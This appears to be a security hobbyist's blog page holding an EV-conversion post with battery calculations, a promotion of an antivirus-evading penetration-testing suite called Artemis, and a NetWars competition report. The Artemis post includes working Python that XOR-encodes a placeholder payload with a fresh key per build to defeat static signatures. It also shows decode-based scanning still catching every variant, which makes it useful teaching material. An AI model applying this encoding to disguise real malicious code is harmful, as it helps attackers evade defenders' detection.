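    """Series cell count for a nominal pack voltage, rounded up. The epsilon
    guards against float error such as 144/3.2 landing a hair under 45."""
    return math.ceil(pack_v / cell_v - 1e-9)


def peukert_capacity_ah(rated_ah, rated_hours, draw_amps, k):
    """Effective capacity at a given draw, from Peukert's law:
    t = H * (C / (I * H)) ** k, capacity delivered = I * t.
    k = 1 returns the rated capacity (LiFePO4 is close to this);
    k ~ 1.2 at a 1C draw returns roughly 55% of rated, in line with the
    post's lead-acid figure."""
    t_hours = rated_hours * (rated_ah / (draw_amps * rated_hours)) ** k
    return draw_amps * t_hours


def cruise_table(volts=PACK_V, draws=DRAW_AMPS, max_dod=MAX_DOD):
    """Per-speed power, Wh/mi and DoD-adjusted power, the shape of the post's table."""
    return {
        mph: {
            "amps": amps,
            "power_w": power_w(volts, amps),
            "wh_per_mi": wh_per_mile(volts, amps, mph),
            "dod_adjusted_w": rated_for_requirement(power_w(volts, amps), max_dod),
        }
        for mph, amps in sorted(draws.items())
    }


if __name__ == "__main__":
    for mph, row in cruise_table().items():
        print(f"{mph} mph: {row['power_w']:.0f} W, {row['wh_per_mi']:.1f} Wh/mi, "
              f"{row['dod_adjusted_w']:.0f} W after DoD")
    whpm_50 = wh_per_mile(PACK_V, DRAW_AMPS[50], 50)
    print(f"{cells_in_series(PACK_V)} x {CELL_AH:.0f} Ah cells at {PACK_V:.0f} V: "
          f"{range_miles(PACK_V, CELL_AH, whpm_50):.1f} mi at 50 mph")
    print(f"40 mi at 50 mph needs {pack_wh_for_range(40, whpm_50):.0f} Wh nominal")
    pb = peukert_capacity_ah(CELL_AH, RATED_HOURS, CELL_AH, PEUKERT_K_PB)
    print(f"100 Ah lead-acid at 100 A delivers {pb:.1f} Ah (k={PEUKERT_K_PB})")
```

Running it gives 259.2 Wh/mi at 50 mph and about 350 Wh/mi at 70 mph, a useful sanity check on the 250-300 Wh/mi ballpark quoted above, and the lead-acid case lands at roughly 55 Ah from a 100 Ah battery at a 100 A draw, consistent with the 55% figure. A 45-cell, 100 Ah pack at 144 V covers about 44 miles at the 50 mph draw before hitting the DoD limit.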

EV Setup

I want my “muscle” car to handle with the same level of growl you would expect out of a small block V8 like the 302 Mustangs are famous for. A little bit of tire squeal is appealing, especially on a bad day! In EV speak we have a few values to work with. What is somewhat counterintuitive is that each is predominantly controlled by a different component of the car. That means that horsepower isn’t as simple as a big motor.

Value            Result                    Control System
Volts (V)        Horsepower (Top Speed)    Battery Pack -> Motor Max
Amperage (A)     Torque (Acceleration)     Motor Controller
Amp hours (Ah)   Range                     Battery Pack


An electric car is a system. High voltage means high top speed, but only if both your motor controller and your electric motor can support it. Your controller can always output the max amperage it is rated for; however, the voltage sag it places on batteries that aren’t rated for that current can be catastrophic. What is similar to an ICE vehicle is that the more fuel (amp-hours) you pack into it, the farther it can go in one straight shot.

I found that I could get a really good deal on certain pieces of equipment by buying used. Since EV components are typically rated to work for a long time without breaking, I felt safe buying parts like the motor and controller second hand. The current rig I am planning to build, with associated specs, is:

Parts List             Specs              Notes
NetGain WarP 9 Motor   156V continuous    Should handle like a small block V8 when fed properly
Manzanita Zilla 1KHV   1K Amps/300V       HV controller is powerful enough to handle dual WarP 9s if I upgrade in the future
PWN Real Force         3.2V 100AH/170V    Not sure about these yet…

Reading around online I’ve found that the WarP 9 should run at 170V fairly stably as long as it is kept within its overall power limits. The controller is also capable of adjusting the true voltage/current seen by the motor, thereby shielding it from the battery pack. This means that as long as my pack is not over 300V it should be within the controller’s limits, but in order to run near the WarP 9’s maximum voltage (to maximize top speed) I will need to be careful not to choose batteries with too much Ah, opting instead for higher voltage (more on this in a future post).

OMG!!! What did I sign myself up for!

Those are the general details of my conversion project. I decided to just jump right in and start working on this car because I’d otherwise never actually get around to it. The most difficult part of the project might not actually be the EV conversion. I have three major goals in mind:

  1. Make a cool electric car
  2. Make said car actually look cool too
  3. Create a sick car computer system to jam out and hack the planet!

I’m not too worried about that last part… it’s my forte; however, that second bullet might give me some trouble and will be the focus of my next post. I want to make the whole thing look very different than stock. This is going to involve a LOT of fiberglass and carbon fiber fabrication work! I have NO idea what I’m doing, but I can’t wait to get started! I’m glad to have you along for the ride. Please comment below if you have any questions or want to provide suggestions/encouragement. Most importantly, please comment if you think I’m an idiot and have a better idea or a flaw to point out! “You’re dumb and this is why” are the best comments out there!


P.S. Sorry about the exclamation marks… I get excited

Accelerate your Attack with Artemis

It is widely acknowledged that antivirus is not an effective security mechanism against 0-day threats. It is not until malware has been out in the wild propagating for a while that it catches a vendor’s eye and a signature for it is developed. Once that happens it is trivial for a malicious actor to modify his source code while preserving the functionality of his tool, and then the process starts all over again. Unfortunately, for the penetration tester this means that each one of us must have our own individual solution to the antivirus problem in order to give our clients the value they deserve out of an information security assessment. After all, if the bad guys are doing it, it MUST also be a part of our security evaluation procedures. Penetration testers should not have to spend their time bypassing a security mechanism that other less ethical hackers would simply vaporize. We built Artemis to solve this deficiency.

Artemis is an advanced malware simulation suite capable of emulating the Advanced Persistent Threat. Artemis raises the bar, allowing ethical hackers and penetration testers the luxury of an advanced set of features equivalent to many of the tools employed by criminal gangs today. By abstracting polymorphism to a server-based platform at cevincere.com, Artemis is able to stay one step ahead of antivirus vendors and ensure that penetration testers can give their clients the value that they deserve.

How Artemis Bypasses Antivirus

Cevincere uses several techniques to generate a unique binary for every build. Because the bytes of each Artemis binary differ substantially from the last, a static signature written against one copy does not match the next, so signature-based AV cannot keep an effective signature. Note the scope of that claim: it defeats pattern matching on the file as it sits on disk, not behavioral, heuristic or sandbox detection, which judges what the binary does once it runs.
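To make the signature argument concrete, here is a toy added for this post; it is not Artemis or Cevincere code and does not reproduce their techniques. The “payload” is a constructed placeholder string, and the encoder is a plain XOR with a fresh random key and a random-length junk prefix per build. A static scanner matches the plain copy and none of the re-encoded variants, while a scanner that sees the decoded body (what emulation, sandboxing or a memory scan gets) still matches every one of them, which is exactly why the feature list below is careful to say signature-based detection.

```python
"""Why a static byte signature stops matching once a payload is re-encoded per
build. Added example; the payload is a constructed placeholder, not a tool."""
import hashlib
import os

# Constructed stand-in for a tool body. A vendor signature would be some
# distinctive substring of it once the tool has been seen in the wild.
PAYLOAD = b"EXAMPLE-AGENT v1: connect-back every 300s to <redacted>; run tasks"
SIGNATURE = b"connect-back every"   # the byte pattern a signature scanner looks for


def xor(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key is the identity."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_variant(payload: bytes, key_len: int = 8) -> bytes:
    """Produce one polymorphic variant of the same payload.
    Layout: [junk_len:1][junk][key_len:1][key][xor-encoded body].
    Fresh random junk (1-16 bytes) and a fresh random key every call, so
    every build is a different byte stream for identical behaviour."""
    junk = os.urandom(1 + os.urandom(1)[0] % 16)
    key = os.urandom(key_len)
    return bytes([len(junk)]) + junk + bytes([key_len]) + key + xor(payload, key)


def decode_variant(blob: bytes) -> bytes:
    """What the loader stub does at run time: skip junk, read the key, decode."""
    junk_len = blob[0]
    pos = 1 + junk_len
    key_len = blob[pos]
    key = blob[pos + 1: pos + 1 + key_len]
    return xor(blob[pos + 1 + key_len:], key)


def static_scan(blob: bytes) -> bool:
    """Signature-based AV in one line: is the known pattern in the file bytes?"""
    return SIGNATURE in blob


def behavioral_scan(blob: bytes) -> bool:
    """A detector that runs or emulates the stub sees the decoded body, so the
    very same signature matches again regardless of the on-disk encoding."""
    return SIGNATURE in decode_variant(blob)


def evaluate(n_variants: int = 20) -> dict:
    """Build n variants and count what each kind of scanner catches."""
    variants = [encode_variant(PAYLOAD) for _ in range(n_variants)]
    return {
        "plain_static_hit": static_scan(PAYLOAD),
        "variant_static_hits": sum(static_scan(v) for v in variants),
        "variant_behavioral_hits": sum(behavioral_scan(v) for v in variants),
        "distinct_hashes": len({hashlib.sha256(v).hexdigest() for v in variants}),
        "roundtrip_ok": all(decode_variant(v) == PAYLOAD for v in variants),
    }


if __name__ == "__main__":
    for name, value in evaluate().items():
        print(f"{name}: {value}")
```

Twenty builds yield twenty distinct SHA-256 hashes and zero static hits, yet twenty behavioral hits: the bytes changed, the program did not. Signature rotation buys time against file-pattern matching only; the defensive answer is to match on what the decoded code does, not on how it is stored.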

Features

  • Evades signature-based anti-virus detection
  • Integrates with free tools like the Metasploit Framework & Armitage
  • Robust communication channel maximizes connectivity
  • Increases stealth by dialing back on a customizable interval

I hope that Artemis is able to help you push your penetration tests to the next level! The video below is a short demonstration of how Artemis may be able to assist you. Happy Hacking!

NetWars — Tournament of Champions

Last week I competed in the NetWars Tournament of Champions competition put on by SANS at their annual Cyber Defense Initiative in Washington, D.C. It was a great opportunity to flex one’s cyber muscle. Here is a link to their press release on the event.

The competitive atmosphere was palpable, and as the tournament began ramping up you could very nearly taste the excitement in the air. It was obvious when the scoring servers opened, because one hundred or so giddy hackers were instantaneously shrouded in a mantle of silence. Game time! I battled my way through progressively challenging obstacles to the beat of some of the most… interesting… music I’ve ever heard in my life, but at the end of day one I was actually only in 9th place overall. Walking back into the room on day two instantly transported you back into the zone, and if our monotone responses to Ed Skoudis’ enthusiastic questions were anything to judge by, we were raring to go. When they finally released the hounds, it was as if we had immediately run into a brick wall. The new NetWars is much more difficult than its predecessor. I’d have to say that is what helped me; when things got hard I started to shine.

Exposure, if there were a word for what I took away from NetWars that would be it. While trolling the Internet for tricks and practicing them against your own network is great, I really think that the best way to develop the critical thinking skills necessary to be a real threat, is to be confronted with something new. The bad guys have it easy. There is an overabundance of new yet juicy targets for them to interdict, readily available on the web. For the ethical hackers among us acquiring this experience is much more difficult, and we need it if we are to keep the wolves at bay. NetWars Tournament of Champions was an all-new sequence of challenges that forced you to evaluate the problem, hypothesize potential solutions, and finally break in. There are few ways to improve your tradecraft that can compare.

On to the spoils! Everyone invited to the Tournament of Champions received exceedingly nifty, yet awkward to wear, sound activated, flashing shirts. Unintended bonus, you can swap in the batteries from your shirt if your Bluetooth keyboard runs out of juice, nice!

Grand prize at NetWars Tournament of Champions – The Golden Ticket:

You have won FIRST PLACE in the second annual SANS NetWars Tournament of Champions, an achievement of outstanding, astonishing proportions. Through in-depth knowledge, cutting-edge skills, and deep cunning, you secured victory!

As the ultimate winner, winner you will enjoy a trip to spend an amazingly geektastic day at NetWars Research World Headquarters. You’ll observe first-hand the NetWars super-secret lair and command center. Your exclusive travel voucher is valid for up to $500 in flight costs, plus one night of hotel accommodations, and entitles you to spend a full day with Ed Skoudis and his team, seeing how they design, build, and operate SANS NetWars challenges.

It gets even better. You’ll tour the steam punk office, a perfect blend of 1880’s design and cutting-edge technology, infused with a collection of historical crypto systems and curious gadgets. Your adventure will include the Secret Room, the Secret-Secret Room, and experiments with a genuine World War Two Enigma machine. You’ll also feast with Ed and the team at a nearby restaurant, geeking out with in-depth discussions of all things infosec.

But, wait, there’s more! Best of all, during your special day, you’ll get to experience the new SANS NetWars CyberCity. This miniaturized town, chock full of NetWars missions, is our most ambitious challenge ever, designed to teach cyber warriors how cyber action can have kinetic effect against real-world systems. As the ultimate NetWars champion, you’ll get serious bragging rights as you complete several CyberCity missions!

Hereby duly signed, with hearty congratulations, by:

Ed Skoudis, Yori Kvitchko

I also received a plaque commemorating my victory:

[image: champion plaque]

Finally, the scoreboard at the end of the competition!

[image: final scoreboard]